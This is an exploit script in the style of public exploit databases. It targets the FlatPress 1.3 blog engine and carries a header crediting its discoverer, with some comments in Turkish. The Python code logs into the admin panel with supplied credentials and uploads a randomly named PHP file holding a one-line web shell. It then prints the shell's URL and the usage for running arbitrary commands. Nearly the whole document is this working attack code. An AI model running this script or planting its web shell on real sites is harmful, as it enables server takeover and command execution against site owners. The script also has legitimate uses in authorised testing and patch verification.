# Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Rastgele bir string oluşturur.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url = f"http://{base_url}/admin.php?p=uploader&action=default" with requests.Session() as session: # Exploiting print("Exploiting...") time.sleep(1) # Giriş yapma denemesi login_data = { 'user': username, 'pass': password, 'submit': 'Login' } print("Logging in...") response = session.post(login_url, data=login_data) time.sleep(1) if "Logout" in response.text: print("Login Successful!") else: print("Login Failed!") print(response.text) return # Dosya yükleme denemesi print("Shell uploading...") time.sleep(1) # Form verileri ve dosyalar files = { 'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'), } form_data = { '_wpnonce': '9e0ed04260', '_wp_http_referer': '/admin.php?p=uploader', 'upload': 'Upload' } response = session.post(upload_url, files=files, data=form_data) if "File(s) uploaded" in response.text or "Upload" in response.text: shell_url = f"http://{base_url}/fp-content/attachs/{filename}" print(f"Your Shell is Ready: {shell_url}") time.sleep(1) print(f"Shell Usage: {shell_url}?0=command") else: print("Exploit Failed!") print(response.status_code, response.text) # Örnek kullanım: python script.py siteadi.com username password if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: script.py <base_url> <username> <password>") else: base_url, username, password = sys.argv[1:] login_and_upload(base_url, username, password)